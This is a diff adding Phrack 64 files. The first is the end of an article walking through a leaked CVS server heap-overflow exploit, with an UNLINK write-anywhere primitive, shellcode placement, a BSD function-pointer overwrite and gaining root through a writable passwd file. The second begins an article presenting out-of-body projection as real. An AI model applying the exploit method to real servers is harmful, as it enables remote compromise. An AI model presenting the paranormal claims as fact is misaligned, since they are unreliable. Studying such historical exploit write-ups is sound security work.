+
+
+We will, through this article, show you how the exploitation under the
+Linux operating system was made possible, and then study the BSD case.
+Both exploitation techniques are different and they both lead to a
+targetless and "oneshot" scenario. Remember that the code is 3-years
+old. I know that since, the glibc library has included a lot of changes
+in its malloc code. Foremost, with glibc 2.3.2, the flag MAIN_ARENA
+appeared, the FRONTLINK macro was removed and there was the addition
+of a new linked list, the "fast_chunks". Then, since version 2.3.5,
+the UNLINK() macro was patched in a way to prevent a "write 4 bytes to
+anywhere" primitive. Last but not least, on the majority of the systems,
+the heap is randomized by default along with the stack. But it was not
+the case at the time of this exploit. The goal of this article, as it
+was explained earlier, is not to teach you new techniques but instead to
+explain you what were the techniques used at that time to exploit the bug.
+
+
+--[ 2 - The story of the exploit
+
+
+This bug has originally been found by [CENSORED]. A first proof of concept
+code was coded by kujikiri of ac1db1tch3z in 2003. The exploit was working
+but only for a particular target. It was not reliable because all the
+parameters of the exploitable context were not taken into account. The
+main advantage of the code was that it could authenticate itself to the
+CVS server and trigger the bug, which represents an important part in
+the development of an exploit.
+
+The bug was then showed to another member of the ac1db1tch3z team.
+It's at that moment that we finally decided to code a really reliable
+exploit to be use in the wild. A first version of the exploit was coded
+for Linux.  It was targetless but it needed about thirty connexions
+to succeed.  This first version of the exploit submitted some addresses
+to the CVS server in order to determine if they were valid or not by
+looking if the server crashed or not.
+
+Then another member ported the exploit for the *BSD platform. As a
+result, a targetless and "oneshot" exploit was born. As a challenge,
+I tried to came up with the same result for the Linux version, and
+my perseverance finally paid back. Meanwhile, a third member found an
+interesting functionality in CVS, that wont be presented here, that gives
+the possibility to bruteforce the three mandatory parameters necessary
+for a successful exploitation: the cvsroot, the login and the password.
+
+It took me one night of passion (nothing sexual) to gather all those
+three pieces of code into one, and the result was cvs_freebsd_linux.c,
+which was later leaked. Another member of the underground later coded a
+Solaris version, but without the targetless and "oneshot" functionality.
+This exploit won't be presented here.
+
+This bug, as a matter of fact, was later "discovered" by Stefan Esser
+and disclosed by e-matters. We had a doubt that Stefan Esser himself
+found that exact same bug which was known in the underground. Even if
+he hadn't done so, he later redeemed himself while auditing the CVS
+source code with a fellow of his and by finding a certain number of
+other bugs. This proves he is able to find bugs, whatever.
+
+The code was finally made public by [CENSORED] who signed it with "The
+Axis of Eliteness", and bragged about the fact that he already rooted
+every i interesting targets currently available. It was not a great lost,
+even though it made a pinch at the heart to see publicly that opensource
+CVS servers went compromised.
+
+
+
+--[ 3 - The Linux exploitation: Using malloc voodoo
+
+
+The original flaw was a basic heap overflow. Indeed, it was possible
+to overwrite the heap with data under our control, and even to insert
+non alphanumeric characters without buffer length restrictions. It was
+a typical scenario.
+
+Moreover, and that's what is wonderful with the CVS server, by analyzing
+the different possibilities, we figured out that it was quite easy to
+force some calls to malloc() of an arbitrary size and chose the ones
+that we want to free(), with little restrictions.
+
+The funny thing is, when I originally coded the Linux version of
+the exploit, I did not know that it was possible to overwrite the
+memory space with completely arbitrary data. I thought that the only
+characters that you could overwrite memory with were 'M' and 0x4d. I
+had not analyzed the bug enough because I was quickly trying to find
+an interesting exploitation vector with the information I already had
+in my hands. Consequently, the Linux version exploits the bug like a
+simple overflow with the 0x4d character.
+
+The first difficulty that you meet with the heap, is that it's pretty
+unstable for various reasons. A lot of parameters change the memory
+layout, such as the amount of memory allocations that were already
+performed, the IP address of the server and other internal parameters of
+the CVS server. Consequently, the first step of the process is to try
+to normalize the heap and to put it in a state where we have complete
+control over it. We need to know exactly what is happening on the remote
+machine: to be sure about the state of the heap.
+
+A small analysis of the possibilities that the heap offers us reveal this:
+
+I had to analyze the various possibilities of memory allocation offered by
+the CVS server. Fortunately, the code was quite simple. I quickly found,
+by analyzing all the malloc() and free() calls, that I could allocate
+memory buffers with the "Entry" command.
+
+The function that accomplishes this is serve_entry, the code is quite
+straightforward:
+
+ static void serve_entry (arg)
+       char *arg;
+ {
+        struct an_entry *p; char *cp;
+
+        [...]  cp = arg; [...]  p = xmalloc (sizeof (struct an_entry)); cp
+        = xmalloc (strlen (arg) + 2); strcpy (cp, arg); p->next = entries;
+[1]     p->entry = cp;
+        entries = p;
+ }
+
+Inside this function, which takes as an argument a pointer to a string
+that we control, there is a memory allocation of the following structure:
+
+ struct an_entry {
+        struct an_entry *next; char *entry;
+ } ;
+
+
+Then, memory for the parameter will be allocated and assigned to the
+field "entry" of the previously allocated "an_entry" structure that we
+already defined, as you can see in [1]. This structure is then added
+to the linked list of entries tracked by the global variable "struct
+an_entry * entries".
+
+Therefore, if we are Ok with the fact that small "an_entry" structures
+are getting allocated in between our controlled buffers, we can then
+use this vector to allocate memory whenever we want.
+
+Now, if we want to call a free(), we can use the CVS "noop" command which
+calls the "server_write_entries()" function. Here is a code snippet from
+this function:
+
+ static void server_write_entries () {
+        struct an_entry *p; struct an_entry *q;
+
+        [...]  for (p = entries; p != NULL;)
+         {
+                [...]  free (p->entry); q = p->next; free (p); p = q;
+          }
+        entries = NULL;
+ }
+
+As you can see, all the previously allocated entries will now be free().
+Note that when we talk about an 'entry' here, we refer to a pair of
+structure an_entry with his ->entry field that we control.
+
+Considering the fact that all the buffers that we allocated will be freed,
+this technique suits us well. Note that there were other possibilities
+less restrictive but this one is convenient enough.
+
+So, we know now how to allocate memory buffers with arbitrary data in it,
+even with non alphanumeric characters, and how to free them too.
+
+
+Let's come back to the original flaw that we did not described yet. The
+vulnerable command was "Is_Modified" and the function looked like this:
+
+ static void serve_is_modified (arg)
+        char *arg;
+  {
+        struct an_entry *p; char *name; char *cp; char *timefield;
+
+        for (p = entries; p != NULL; p = p->next) {
+[1]                name = p->entry + 1;
+                cp = strchr (name, '/'); if (cp != NULL
+                    && strlen (arg) == cp - name && strncmp (arg, name,
+                    cp - name) == 0)
+                {
+                    if (*timefield == '/') {
+                        [...]  cp = timefield + strlen (timefield);
+                        cp[1] = '\0'; while (cp > timefield) {
+[2]                         *cp = cp[-1];
+                            --cp;
+                        }
+                    } *timefield = 'M'; break;
+                }
+        }
+ }
+
+As you can see, in [2], after adding an entry with the "Entry" command,
+it was possible to add some 'M' characters at the end of the entries
+previously inserted in the "entries" linked list. This was possible for
+the entries of our choice.  The code is explicit enough so I don't detail
+it more.
+
+We now have all the necessary information to code a working exploit.
+Immediately after we have established a connection, the method used to
+normalize the heap and put it in a known state is to use the "Entry"
+command. With this particular command, we can add buffers of an arbitrary
+size.
+
+The fill_heap() function does this. The macro MAX_FILL_HEAP tells the
+maximum number of holes that we could find in the heap. It is set at a
+high value, to anticipate for any surprise. We start by allocating many
+big buffers to fill the majority of the holes. Then, we continue to
+allocate a lot of small buffers to fill all the remaining smaller holes.
+
+At this stage, we have no holes in our heap.
+
+Now, if we sit back and think a little bit, we know that the heap layout
+will looked something like this:
+
+[...][an_entry][buf1][an_entry][buf2][an_entry][bufn][top_chunk]
+
+Note : During the development of the exploit, I modified the malloc
+code to add functions of my own that I preloaded with LD_PRELOAD. This
+modified version would then generate various heap schemes to help me
+debug the heap. Note that some hackers use heap simulators to know the
+heap state during the development process. These heap simulators can be
+simply a gdb script or something using the libncurses. Any tools which
+can represent the heap state is useful.
+
+Once the connection was established and the fill_heap() function was
+called, we knew the exact layout of the heap.
+
+The challenge was now to corrupt a malloc chunk, insert a fake chunk
+and make a call to free() to trigger the UNLINK() macro with 'fd' and
+'bk' under our control. This would let us overwrite 4 arbitrary bytes
+anywhere in memory. This is quite easy to do when you have the heap
+in a predictable state. We know that we can overflow "an_entry->entry"
+buffers of our choice. We will also inevitably overwrite what's located
+after this buffer, either the top chunk or the next "an_entry" structure
+if we have previously allocated one with another "Entry".  We will try to
+use the latter technique because we don't want to corrupt the top chunk.
+
+Notice: From now on, since the UNLINK macro now contains security checks,
+we could instead use an overflow of the top chunk and trigger a call to
+set_head() to exploit the program, as explained in another article of
+this issue.
+
+Practically, we know that chunk headers are found right before the
+allocated memory space. Let's focus on the interesting part of the memory
+layout at the time of the overflow:
+
+[struct malloc_chunk][an_entry][struct malloc_chunk][buf][...][top_chunk]
+
+By calling the function "Is_modified" with the name of the entry that we
+want to corrupt, we will overwrite the "an_entry" structure located after
+the current buffer.  So, the idea is to overwrite the "size" field of
+a struct an_entry, so it become bigger than before and when free will
+compute the offset to the next chunk it will directly fall inside the
+controlled part of the ->entry field of this struct an_entry.  So, we only
+need to add an "Entry" with a fake malloc chunk at the right offset. See :
+
+#define NUM_OFF7        (sizeof("Entry ")) #define MSIZE           0x4c
+#define MALLOC_CHUNKSZ  8 #define AN_ENTRYSZ      8 #define MAGICSZ
+((MALLOC_CHUNKSZ * 2) + AN_ENTRYSZ) #define FAKECHUNK       MSIZE -
+MAGICSZ + (NUM_OFF7 - 1)
+
+The offset is FAKECHUNK.
+
+Let's sum up all the process at this point:
+
+1. The function fill_heap() fills all the holes in the heap by sending
+a lot of entry thanks to the Entry command..
+
+2. We add 2 entries : the first one named "ABC", and another one with the
+   name "dummy". The ->entry field of "ABC" entry will be overflowed and 
+   so the malloc_chunk of the struct an_entry "dummy" will be modified.
+
+3. We call the function "Is_modified" with "ABC" as a parameter, numerous
+   times in a row until we hit the size field of the malloc_chunk.
+   This has for effect to add 'M' at the end of the buffer, outside
+   its bound.  Inside the ->entry field of the "dummy" entry we have
+   a fake malloc_chunk at the FAKECHUNK offset.
+
+4. If we now call the function "noop", it will have for effect to free()
+   the linked list "entries". Starting from the end, the entry "dummy",
+   and its associated "an_entry" structure, the entry "ABC" and its
+   associated "an_entry" structure will be freed. Finally, all the
+   "an_entry" structures that we used to fill the holes in the heap will
+   also be freed. So, the magic occurs during the free of the an_entry of
+   "dummy".
+
+The exact malloc voodoo is like this :
+
+We have overwritten with 'M' characters the "size" field of the malloc
+chunk of the "an_entry" structure next to our "ABC" buffer.  From there,
+if we free() the "an_entry" structure that had its "size" field corrupted,
+free() will try to get to the next memory chunk at the address of the
+chunk + 'M'. It will bring us exactly inside a buffer that we have
+control on, which is the buffer "dummy". Consequently, if we can insert
+a fake chunk at the right offset, we are able to write 4 bytes anywhere
+in memory.
+
+From this point, 90% of the job is already done!
+
+Notice: Practically, it is not enough to only create a fake next chunk.
+You need to make sure a second next chunk is also available. Indeed,
+DLmalloc is going to check the PREV_INUSE byte of the second next chunk
+to check if it the next chunk buffer is free or occupied. The problem is
+that we can not put '\0' characters inside the fake chunk, so we need
+to put a negative size field, to make sure that the next chunk of the
+next chunk is before the first chunk. Practically, it works and I have
+used this technique many times to code heap overflows. Check the macro
+SIZE_VALUE inside the exploit code for more information.  Its value is -8.
+
+Now, we will dig a little bit deeper inside the exploit. Let's take a
+look at the function detect_remote_os().
+
+Here is the code:
+
+ int detect_remote_os(void) {
+        info("Guessing if remote is a cvs on a linux/x86...\t");
+        if(range_crashed(0xbfffffd0, 0xbfffffd0 + 4) ||
+              !range_crashed(0x42424242, 0x42424242 + 4))
+        {
+                printf(VERT"NO"NORM", assuming it's *BSD\n"); isbsd =
+                1; return (0);
+        } printf(VERT"Yes"NORM" !\n"); return (1);
+ }
+
+
+With this technique, we will trigger an overwrite operation to an
+address that is always valid. This location will be a high address inside
+the stack, for example 0xbfffffd0. If the server answers properly, it
+means it did not crashed. If it did not crashed despite the overflow,
+it either means that the UNLINK call worked (i.e. It means we are under
+Linux with a stack mapped below 0xc0000000) or that the UNLINK call did
+not get triggered (= not Linux).
+
+To verify this, we will then try to write to an invalid, non mapped
+address, such as 0x42424242. If the server crashes, then we know for
+sure that the exploit does work correctly and that we are now on a Linux
+system. If it's not the case, we switch to the FreeBSD exploitation.
+
+Right now, the only thing that we are able to do is to trigger a call
+to UNLINK in a reliable way and to make sure that everything is working
+properly. We now need to get more serious about this, and get to the
+exploitation process.
+
+Generally, to successfully exploit such a vulnerability, we need to
+know the address of the shellcode and the address of a function pointer
+in memory to overwrite. By digging more into the problem, it is always
+possible to make the exploit work with only one address instead of two.
+It may even be possible to make it work without providing any memory
+addresses! Here is the technique used to accomplish such a feat.
+
+Indeed, we are able to allocate an infinite number of buffers next to
+each others, to corrupt their chunk headers and to free() them after
+with server_write_entries(). Being able to do this means that we can
+trigger more than one call to UNLINK, and this is what is going to make
+the difference. Being able to overwrite more than one memory address is
+a technique frequently used inside heap overflow exploits and usually
+makes the exploit targetless. In the following lines, I will explain
+how this behavior can lead us to the creation of the memcpy_remote()
+function, which takes the same arguments as the famous memcpy() function
+with the exception that it writes in the memory space of the exploited
+process. When we are able to trigger as many UNLINK calls as we want,
+we will see that it's possible to turn the exploitation scenario in a
+"write anything anywhere" primitive.
+
+What are the benefits of being able to do this?
+
+If we can write what we want at the address that we want, without any
+size constraints, we can copy the shellcode in memory. We will write
+it at a really low address of the stack, and I will explain why later.
+To know what address to overwrite, we will overwrite the majority of
+the stack with addresses that point to the beginning of the shellcode.
+That way, we will overwrite the saved instruction pointer from a call
+to free() and we will obtain the control of %eip.
+
+All the art of this exploitation resides in the advance use of the UNLINK
+macro. We will go in the details, but before, let's remember what is
+the purpose of the UNLINK macro. The UNLINK macro takes off an entry
+from the doubly linked list. Indeed, the pointer "prev" of the next
+chunk following the one we want to unlink is switched with the "prev"
+pointer of the chunk we are currently unlinking. Also, the pointer "next"
+of the preceding chunk before the one we want to unlink is switched with
+the "next" pointer of the chunk we are currently unlinking.
+
+Remember the fact that only free malloc chunks are in the doubly linked
+lists, which are then grouped by inside binlists.
+
+The "prev" field is named BK and it is located at offset 12 of a malloc
+chunk. The "next" field is named FD and is at offset 8 of malloc chunk.
+
+We can then obtain the following macros:
+
+#define CHUNK_FD        8 #define CHUNK_BK        12 #define SET_BK(x)
+(x - CHUNK_FD) #define SET_FD(x)       (x - CHUNK_BK)
+
+If we want to write 0x41424344 at 0x42424242, we need to call the UNLINK
+macro the following way:
+
+UNLINK (SET_FD(0x41424344), SET_BK(0x42424242)).
+
+The thing is that we want to write "ABCD" at 0x42424242, but UNLINK will
+write both at 0x42424242 and at 0x41424344. "ABCD" is not a valid address.
+
+The solution to mitigate this problem is to write a character at a time.
+We will thus write "A", then "B", then "C" and after this "D" until
+there is nothing left to write. To achieve this, we need a range of 0xFF
+characters that we are willing to trash. It is easy to obtain.  Indeed,
+if we take a really high address in the stack, we would find ourselves
+overwriting environment variables that were first stocked at the top of
+the stack.
+
+At the time, we were writing this exploit for stacks that were mapped
+below the Kernel space / User space, which was 0xc0000000. The exact
+address that I chose was 0xc0000000 - 0xFF.
+
+Basically, if we want to write "ABCD" at 0xbfffd000, we will need to
+execute the following calls to UNLINK:
+
+ UNLINK (UNSET_FD(0xbfffd000), UNSET_BK(0xbfffff41)) (0x41 being
+        the hexadecimal equivalent of 'A').
+
+ UNLINK (UNSET_FD(0xbfffd001), UNSET_BK(0xbfffff42)) (0x42 being
+        the hexadecimal equivalent of 'B').
+
+And so on ...
+
+So, if we are able to execute as many UNLINK as we want, and if we have
+a range of address of 0xFF that can be modified without consequences on
+program execution, then we are able to make 'memcpy' calls remotely.
+
+To sum up:
+
+1. We normalize the heap to put it in a predictable state.
+
+2. We overwrite the size field of a previously allocated chunk of an
+   "an_entry" struct. When this an_entry entry will be free(), the
+   memory allocator will think that the next chunk is located inside data
+   under our control. This next fake chunk will then be marked as free,
+   and the two memory blocks will be consolidated as one. Malloc will
+   then take the next chunk off its doubly linked list of free chunks,
+   and it will thus trigger an UNLINK, with a FD and BK under our control.
+
+3. Since we can allocate as many "an_entry" entries as we want and free
+   them all at the same time thanks to server_write_entries(), we can
+   trigger as many UNLINK as we want. This leads us, as we just saw,
+   to the creation of the memcpy_remote() function, that will let us
+   write what we want and where we want.
+
+4. We use the function memcpy_remote() to write the shellcode at a really
+   low address of the stack.
+
+5. We then overwrite each address in the stack, starting from the top,
+   until we hit a saved instruction pointer.
+
+6. When the internal function that frees the chunk will return, our
+   shellcode will then be executed.
+
+
+Here it is !
+
+
+Notice: We have chosen a really low address in the stack, because even
+if we hit an address that is not currently mapped, this will trigger a
+pagefault(), and instead of aborting the program with a signal 11, it
+will stretch the stack with the expand_stack() function from the kernel.
+This method is OS generic. Thanks bbp.
+
+--[ 4 - A couple of words on the BSD exploitation
+
+As promised, here is the explanation of the technique used to exploit the
+FreeBSD version. Consider the fact that with only minor changes, this
+exploit was working on other operating systems. In fact, by switching
+the shellcode and modifying the hardcoded high addresses of the heap,
+the exploit was fully functional on every system using PHK malloc.
+This exploit was not restricted only to FreeBSD, a thing that the script
+kiddies didn't know.
+
+I like to see that kind of tricks inside exploits. It makes them powerful
+for the expert, and almost useless to the kiddie.
+
+The technique explained here is an excellent way to take control of the
+target process, and it could have been easily used in the Linux version
+of the exploit. The main advantage is that this method does not use the
+magic of voodoo, so it can help you bypass the security checks done by
+the malloc code.
+
+First, the heap needs to be filled to put it in a predictable state, like
+for all the heap overflow exploits. Secondly, what we want to do basically
+is to put a structure containing function pointers right behind the buffer
+that we can overflow, in order to rewrite functions pointers.  In this
+case, we overwrote the functions pointers entirely and not partially.
+
+Once this is done, the only thing that remains to do is to repeatedly send
+big buffers containing the shellcode to make sure it will be available
+at a high address in the heap.
+
+After, we need to overwrite the function pointer and to trigger the use
+of this same function. As a result, the shellcode will then be run.
+
+Practically, we used the CVS command "Gzip-stream" that allocated an
+array of function pointers, inside a subroutine of the serve_gzip_stream()
+function.
+
+Let's recap:
+
+1. We fill_holes() the PHK's malloc allocator so that the buffer that
+we are
+   going to overwrite is before a hole in the heap.
+
+2. We allocate the buffer containing 4 pointers to shellcode at the right
+   place.
+
+3. We call the function "Gzip-stream" that will allocate an array of
+   function pointers right inside our memory hole. This array will be
+   located right after the buffer that we are going to overflow.
+
+4. We trigger the overflow and we overwrite a function pointer with the
+   address of our shellcode (the macro HEAPBASE in the exploit).
+   See OFFSET variable to know how many bytes we need to overflow.
+
+5. With the "Entry" command, we add numerous entries that contain NOPs and
+   shellcode to fill the higher addresses of the heap with our shellcode.
+
+6. We call zflush(1) function which end the gziped-stream and trigger an
+   overwrited function pointer (the zfree one of the struct z_stream).
+   And so on, we retrieve a shell.  If we are not yet root, we look if
+   one cvs's passwd file is writable on the whole cvs tree, which was
+   the case at the time on most of servers, we modify it to obtain a
+   root account.  We re-exploit the cvs server with this account and -
+   yes it is - we have rO0t on the remote. :-)
+
+
+--[ 5 - Conclusion
+
+We thought that it was worth presenting the exploit the way it was done
+here, to let the reader learn by himself the details of the exploitation
+code, which is from now on available in the public domain, even though
+the authors did not want it.
+
+From now on, this section will be included in the upcoming releases of
+phrack. Each issue, we will present the details of an interesting exploit.
+The exploit will be chosen because its development was interesting and the
+the author(s) had a strong determination to succeed in building it. Such
+exploits can be counted on the fingers of your hands (I am talking about
+the leaked ones). With the hope that you had fun reading this ...
+
+--[ 6 - Greeting
+
+To MaXX for his great papers on DL malloc.
diff --git a/phrack64/16.txt b/phrack64/16.txt
new file mode 100644
index 0000000..e96a92e
--- /dev/null
+++ b/phrack64/16.txt
@@ -0,0 +1,384 @@
+              _                                                _
+            _/B\_                                            _/W\_
+            (* *)            Phrack #64 file 14              (* *)
+            | - |                                            | - |
+            |   |            Hacking your brain:             |   |
+            |   |                                            |   |
+            |   |      The projection of consciousness       |   |
+            |   |                                            |   |
+            |   |               by keptune                   |   |
+            (____________________________________________________)
+
+
+Dead Underground, for this new Phrack issue, The Circle of Lost 
+Hackers has decided to start one more new section entitled "Hacking 
+you brain". We already hear you: "what the hell this subject is in 
+relation with computer hacking???". Well, as we already mentioned in 
+other articles, for us hacking is not only computer hacking but 
+it's much more.
+
+The following article, as you will understand, talks about out of body 
+experiences. By publishing this article in a magazine like phrack, we 
+know that it will bring scepticism. The author, in this article, claims 
+that such out of body experiences are possible. One of the main rule 
+of the underground is to not be blind and trust everything simply because 
+an authority claims it, to try everthing by yourself with criticism 
+and a totally open mind spirit. It's why, for us, the unreasoning 
+credulity is something more blameworthy than a presumptuous and septic 
+guy who reject facts without examinating if they are real.
+
+Even if an out of body experience is interesting, what is more interesting
+is the new implication that it leads up. It's unrecognized by the current 
+Science even if it's known for ages. If the following information are 
+true - what we affirm - then it's revolutionary. Be able to live out of 
+your body means that the dead is no the end but only one step that we all 
+have to pass over.
+
+All these reasons make us think that publishing an article like that in 
+Phrack is a good idea. Because before being a computer hacking magazine, 
+phrack is dedicated to spread the occult knowledge, unrecognized and 
+subversive. 
+
+We let you discover - and experiment - by yourselves this fantastic 
+phenomenon that are lucid dreams and out of body projections so that
+you can make up your own opinion.
+
+Have a good read.
+
+
+                   ----------------------------------
+
+                     The projection of consciousness
+
+                                by keptune
+
+Since the Ancient times, as far as we know, humankind has been animated by
+the most impressive curiosity for almost everything, especially for this
+strange thing that is the Mind : something concrete although impalpable to
+the subject, yet invisible to the world. Some of the oldest carvings and
+paintings that have been discovered in Africa are full of dream visions
+and abstract symbols, most likely depicting chamanic inner travels.
+However, it appears that the .power. to investigate how the mind works and
+to retrieve pieces of information on the consciousness and its mecanisms
+has been monopolized early in History by a few ones. Call them chamans,
+sorcerers, wisemen, etc., they have gained a social position through the
+ages by grabing the exclusive rights of these investigations. Which might
+has been wise at first, as the initiations to these practices were mostly
+done from master to disciple in order to keep the teaching intact. But
+indirectly, it has led the majority to be ignorant of these subjects,
+almost fearful about the workings of the consciousness and what could
+modify it.  When the time came for the brand new .modern science. to
+study the Mind, during the XIXth century, some would have thought that
+everything was about to change. But in place it was only the continuity
+of the past traditions, although by fathering new ones: psychologists,
+psychiatrists, neurologists. Nowadays, if you do not have at least a
+master degree in one of these subject, you are simply considered ignorant
+by the scientists about the mind. That.s right, your . own . mind, your
+consciousness. You are just not .authorized. to talk about it, or mocked
+at if you try, like a child who would try to build a skyrocket . cute,
+but impossible. It is no more than another form of monopoly, to control
+the main dogma of materialism in our society. It is like saying that
+you are not intelligent enough to think about it, so just do not try,
+serious people are doing it for you and will tell you what to think and
+how to apprehend your own life. Meanwhile, just work, consume and enjoy.
+
+But guess what: these people, most likely unconsciously as they are being
+.manipulate. too by the main dogma, just want to make you think that
+you canno.t know anything about the mind, your . own . consciousness,
+without them. And you would be a fool to try in spite of this all-powerful
+fact. Which is just wrong. Seriously. In fact, you are the one who
+is all-powerful about his own consciousness. But you must use it, and
+bring it to unknown territories in order to understand it by yourself,
+which is the only way.  Some might be thinking at this point: my mind
+is what it is, what is he talking about? Sometimes I am sad, or joyful,
+but my mind stays the same beneath that. Well, wrong. You just did
+not try to change it, to push it to it.s extreme. I am talking about
+something with the same subjective difference than the physical reality
+and a dream. Think Matrix, less the glasses, the robots and the giant
+killing computer. I am talking about a skill that anyone can develop:
+projection of consciousness, one of the most amazing faculty of the mind.
+
+What is projection of consciousness? Have you ever lucid dream? I mean,
+dreaming and knowing that you are dreaming? Realizing that the world
+around you is just an illusion created by your mind and you did not
+notice it at first? That is a type of projection of consciousness, the
+lowest one in fact. You are projecting your mind out of the feeling
+of your physical body, into another reality. Dreaming is a type of
+projection of consciousness, although non-lucid one are the lowests from
+the lowest, not very interesting for the real mind raiders. But it.s
+a good bridge to do some more serious projection activities.  At this
+point of the article, I know that some are already thinking: whatever,
+dreams are not real. WRONG. That is a typical shortcut from the dominant
+materialistic, so-called .scientific., dogma, which considers that all
+that is not palpable is not real. Then your mind as a unity of perception
+and consciousness is not real, because guess what, even the best EEG
+canno.t find where the mind sets in the brain (if it is in the brain at
+all). All they do is record electrical signals here and there. For your
+mind, the dream is as solid and real as physical reality. That is why
+you wake up sweating from a nightmare, with you heartbeat at 200, and
+still all frightened during a few minutes. Or at the opposite, you wake
+up with a feeling of completeness after a really amazing and beautiful
+dream. Right? A dream is impalpable, but it is real nonetheless for the
+observer, you. And now think about this: about one sixth of your life is
+made of dreams. Almost an entire seperate life, which most people just
+disregard as unreal (=impalpable) and therefore uninteresting. That is
+just sad, when you know all the amazing possibilities of the mind, which
+can . and will . really transform your life by bringing your attention
+to a whole new dimension. Something noboby has ever talked to you about
+I guess. Something that is still mostly undiscovered, where you are a
+real pionnier.
+
+If you have never even lucid dream, you are situated right now at the
+first floor of a skyscrapper, ignoring that there is an elevator just
+behind you that could bring you in no time to a flabbergasting landscape
+and a whole new perspective. Seriously. You canno.t know what your
+mind, your consciousness, is made of unless you accept to explore it by
+yourself. The modern scientific method tends to analyze from an outside
+point of view, which just canno.t led to a full understanding. It would
+be like trying to understand how you watch works without opening it up
+at one time or another.
+
+I guess many are thinking right now about shrooms, pot and crack, salvia
+divinorum, entheogens, hallucinations etc. That.s on the exact opposite of
+what I am about to explain. You do not need anything more than yourself
+(and hopefully your mind too) to project in full consciousness. Plants
+have been used a lot by chamans to attain different levels of perception,
+but nowadays it is very unlikely that you know a chaman that could
+guide you into a safe practice using them. Taking some is therefore
+not recommended for projection of consciousness, as you need to be
+fully aware. Moreover, some might just think afterwards that it was
+hallucinations due to the drugs, which would ruin the whole point of
+the experience.
+
+So let us start. From my own experience (it is always important to speak
+by experience on this subject and not from books or theories, even more
+as the point is to gain a first-hand knowledge of all this), there are
+different levels of projection (the fact of putting your consciousness
+out of the perception of the physical universe, into another form of
+reality). From the lowest to the highest:
+
+- dreams 
+- lucide dreams 
+- wake initiated lucid dreams 
+- full physical projection 
+- higher projections
+
+Everyone knows dreams. Well in fact some people never remember their
+dreams, but everyone can after only a few days of training (thinking
+hard about the last image in mind just after waking up for example is a
+good way to progressively remember full dreams). I won.t talk about it
+here as everyone can achieve this state quite easily.
+
+Lucid dream is a type of dream that not everyone has experienced, or
+for some only a few times. It is dreaming and realizing that something
+is wrong, and eventually that you are in a dream. It opens up a whole
+new perspective to dreaming: have you ever thought of controlling the
+whole universe? Well, with some training, you can in lucid dreams. It
+is also a place to meet solidified parts of your psyche, your
+subconscious. Characters become interfaces with deeper parts of your
+mind. You can retrieve old of lost information or interact with your
+own mind by creating psychic anchors through them. You are like inside
+of you own mind, I mean . really . inside, the universe around you is
+a symbolic materialized form of what you thought was so impalpable
+in the waking state. You can go on the lowest levels of your mind
+.programs. (i.e. your personality etc.) and modify them. Or you can just
+create your own worlds, and enjoy the landscapes, the .people. you meet
+(parts of you in fact, with sometimes what seems to be a real kind of
+independent behaviour and own proto-mind). Something I am experimenting
+with lately is fusioning with the strongest .people. (part of my psyche)
+that I encounter. I just ask to fusion and our bodies melt into one. It
+is a really amazing experience each time, and I gain a lot of knowledge
+that I did not thought I had. It is like reunifying my mind little by
+little. Well, the possibilities are almost limitless, so just think about
+anything you would like to do, and you can! It is also a good place to
+face blocages and fight them. The result in the physical life is real
+if you win. Some have destroyed their OCD in this state, others have
+gained enough willpower to stop drugs or take control of their lives etc.
+
+Becoming lucid for the first time can be however some kind of a
+challenge. Fortunately, many types of training have been developped. Here
+are a few ones. I encourage you to google these for more information
+and technics:
+
+- Make your watch beep every x minutes. It can be quite annoying for other
+people though. However, this beep will progressively be integrated by your
+subconscious mind and will start to appear in your dreams after a week or
+two. What you must do (in physical reality) is check out your surrounding
+everytime your watch beeps. Do this seriously, it is really important to
+get totally involved into this verification of reality. Try to remember
+your whole day, and the past days, for chronological problems etc. Do
+not think that you are in the physical reality but really imagine that
+you might be dreaming. If you realize that there is a problem, well,
+congratulations, you are doing a lucid dream now.
+
+- Do some reality checks the same way when you see something strange, or
+on the opposite (which might work better for some) when you do something
+really basic, like washing your hands, or opening a door. Do it each time
+for a few days or weeks, and very seriously (at least for one minute). You
+will become lucid if you try this while dreaming after it becomes a habit
+(as it will be integrated by the subconscious mind).
+
+- Before you go to sleep, while laying down in your bed, feel the world
+around you, feel that you are lucid, fully aware of yourself. Repeat a few
+times .I WILL be lucid tonight, I WILL be lucide tonight .. while holding
+the feeling of lucidity. Do this until you start sleeping if you want.
+
+Once you become lucid in a dream, stay calm and enjoy. Repeat loudly
+every five seconds (to prevent you from risking to lose your lucidity and
+being caught back into a normal dream) that you are lucid, it will help
+you stay in this state. You can try to fly to move more easily into your
+created universe (lift your legs and even move your arms as if you were
+swimming might help at first), but do not try harder stuff like going
+through walls, teleporting or creating big objects from nothing before
+you have enough experience to stabilize entirely your dream. Indeed the
+mind does not like lucid dreaming at first and it will try to wake you up
+(in this case, if you feel that the dream is losing consistency and the
+image is disapearing, concentrate very hard on your five senses, touch
+the ground, look closely to some details etc. This will help to get you
+back into the dream but you might lose a lot of mental energy doing so so
+repeat actively that you are lucid after that otherwise you might lose
+your lucidity entirely), or to make you lose your lucidity (typically,
+by catching you back into a scenario . a naked member of the opposite
+sex (or same, depending of the sexual preferences) might appear, someone
+will tell you that something has happened to your house, a giant dinosaur
+might start chasing you etc., anything that would get you involved into
+the dream will be used, so do not get caught and stay focused!
+
+If you have imagination and willpower (which I am sure is the case),
+you will see changes in your everyday life and personality in a matter
+of weeks of practice. Your centers of interest might change, as well
+as what you feel is important in life, so stay aware of your needs and
+aspirations. However, this kind of dream initiated lucid dream is still
+not as powerful as a .full. lucid dream.
+
+What I mean by full lucid dream is a dream initiated from the waking
+state. Ok, some might think that dreams can only be initiated from
+this state, as we go to sleep etc. But do you ever remember the exact
+instant when you enter your dream? And moreover, being fully aware
+during the whole process? It is a really flabbergasting experience
+the first few times. It is like being suddenly propelled into another
+world. If you thought dreams appeared slowly, that is far from reality,
+as the transition from your black mind vision to the full-colored and
+3D dream takes no more than a second. You suddenly feel a new body,
+into a whole new world surrounding you. The experience of a WILD
+(Wake Initiated Lucid Dream) is extremely joyful and what one would
+call .real.. Appart from what is happening (you are flying etc.) the
+world seems as real and solid as the physical world would. But it is
+more of an Alice in Wonderland thing going on.  Doing a WILD is a bit
+more tricky than a dream initiated lucid dream, but nothing impossible
+to do fortunately. One technic that is very effective is visualizing
+(=imagining and feeling) yourself walking into a known place (a mall,
+a street in your neibourghood etc.) I think that it is important to
+visualize some place you know (and not an imaginary one) as this will
+stimulate your subconscious in a passive way: it is less demanding to
+the mind to remember things than to create them. I will also prevent you
+from daydreaming a scenario and eventually fall asleep without noticing
+it. So just lay down, close your eyes, relax for a few minutes and start
